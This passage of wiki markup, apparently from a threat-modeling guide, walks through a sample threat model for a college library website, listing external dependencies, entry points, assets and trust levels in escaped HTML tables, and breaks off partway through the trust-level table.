&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt; Description:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website is the first implementation of a website to provide librarians and library patrons (students and college staff) with online services. &lt;br /&gt;
As this is the first implementation of the website, the functionality will be limited. There will be three users of the application: &amp;lt;br/&amp;gt;&lt;br /&gt;
1. Students&amp;lt;br/&amp;gt;&lt;br /&gt;
2. Staff&amp;lt;br/&amp;gt;&lt;br /&gt;
3. Librarians&amp;lt;br/&amp;gt;&lt;br /&gt;
Staff and students will be able to log in and search for books, and staff members can request books. Librarians will be able to log in, add books, add users, and search for books.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Document Owner:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;David Lowry&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Participants:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;David Rook&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Reviewer:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Eoin Keary&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==External Dependencies==&lt;br /&gt;
External dependencies are items external to the code of the application that may pose a threat to the application. These items are typically still within the control of the organization, but possibly not within the control of the development team. The first area to look at when investigating external dependencies is how the application will be deployed in a production environment, and what the requirements surrounding this are. This involves looking at how the application is or is not intended to be run. For example, if the application is expected to run on a server that has been hardened to the organization's hardening standard and is expected to sit behind a firewall, then this information should be documented in the external dependencies section. External dependencies should be documented as follows:&lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique ID assigned to the external dependency.&lt;br /&gt;
# '''Description''' - A textual description of the external dependency.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;External Dependencies&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website will run on a Linux server running Apache.  This server will be hardened as per the college's server hardening standard. This includes the application of the latest operating system and application security patches.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database server will be MySQL and it will run on a Linux server. This server will be hardened as per the college's server hardening standard. This will include the application of the latest operating system and application security patches.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The connection between the Web Server and the database server will be over a private network.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The Web Server is behind a firewall and the only communication available is TLS.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Entry Points==&lt;br /&gt;
Entry points define the interfaces through which potential attackers can interact with the application or supply it with data. In order for a potential attacker to attack an application, entry points must exist. Entry points in an application can be layered, for example each web page in a web application may contain multiple entry points. Entry points should be documented as follows: &lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique ID assigned to the entry point. This will be used to cross reference the entry point with any threats or vulnerabilities that are identified. In the case of layered entry points, a major.minor notation should be used.&lt;br /&gt;
# '''Name''' - A descriptive name identifying the entry point and its purpose.&lt;br /&gt;
# '''Description''' - A textual description detailing the interaction or processing that occurs at the entry point.&lt;br /&gt;
# '''Trust Levels''' - The level of access required at the entry point is documented here. These will be cross referenced with the trust levels defined later in the document.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Entry Points&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;15%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;45%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;HTTPS Port&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website will only be accessible via TLS. All pages within the college library website are layered on this entry point.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Library Main Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The splash page for the college library website is the entry point for all users.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Students, faculty members and librarians must log in to the college library website before they can carry out any of the use cases.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Function&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login function accepts user supplied credentials and compares them with those in the database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Search Entry Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The page used to enter a search query.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Assets==&lt;br /&gt;
The system must have something that the attacker is interested in; these items/areas of interest are defined as assets. Assets are essentially threat targets, i.e. they are the reason threats will exist. Assets can be both physical assets and abstract assets. For example, an asset of an application might be a list of clients and their personal information; this is a physical asset. An abstract asset might be the reputation of an organisation. Assets are documented in the threat model as follows: &lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique ID is assigned to identify each asset. This will be used to cross reference the asset with any threats or vulnerabilities that are identified.&lt;br /&gt;
# '''Name''' - A descriptive name that clearly identifies the asset.&lt;br /&gt;
# '''Description''' - A textual description of what the asset is and why it needs to be protected.&lt;br /&gt;
# '''Trust Levels''' - The level of access required to access the entry point is documented here. These will be cross referenced with the trust levels defined in the next step.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Assets&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;15%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;55%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Library Users and Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to students, faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User Login Details&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login credentials that a student or a faculty member will use to log into the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Librarian Login Details&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login credentials that a Librarian will use to log into the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Personal Data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The College Library website will store personal information relating to the students, faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;System&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to the underlying system.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Availability of College Library Website&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The College Library website should be available 24 hours a day and can be accessed by all students, college faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute Code as a Web Server User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute source code on the web server as a web server user.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process &amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute SQL as a Database Read User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute SQL select queries on the database, and thus retrieve any information stored within the College Library database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute SQL as a Database Read/Write User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute SQL select, insert, and update queries on the database, and thus have read and write access to any information stored within the College Library database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Website&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Session&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the login session of a user to the College Library website. This user could be a student, a member of the college faculty, or a Librarian.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to the Database Server&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to the database server allows you to administer the database, giving you full access to the database users and all data contained within the database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Create Users&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The ability to create users would allow an individual to create new users on the system. These could be student users, faculty member users, and librarian users.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to Audit Data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The audit data shows all audit-able events that occurred within the College Library application by students, staff, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(6) Website Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Trust Levels==&lt;br /&gt;
Trust levels represent the access rights that the application will grant to external entities. The trust levels are cross referenced with the entry points and assets. This allows us to define the access rights or privileges required at each entry point, and those required to interact with each asset. Trust levels are documented in the threat model as follows: &lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique number is assigned to each trust level. This is used to cross reference the trust level with the entry points and assets.&lt;br /&gt;
# '''Name''' - A descriptive name that allows you to identify the external entities that have been granted this trust level.&lt;br /&gt;
# '''Description''' - A textual description of the trust level detailing the external entity who has been granted the trust level.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;70%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Anonymous Web User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website but has not provided valid credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User with Valid Login Credentials&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website and has logged in using valid login credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User with Invalid Login Credentials&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website and is attempting to log in using invalid login credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The librarian can create users on the library website and view their personal information.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;5&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Server Administrator&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database server administrator has read and write access to the database that is used by the college library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Website Administrator&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The Website administrator can configure the college library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
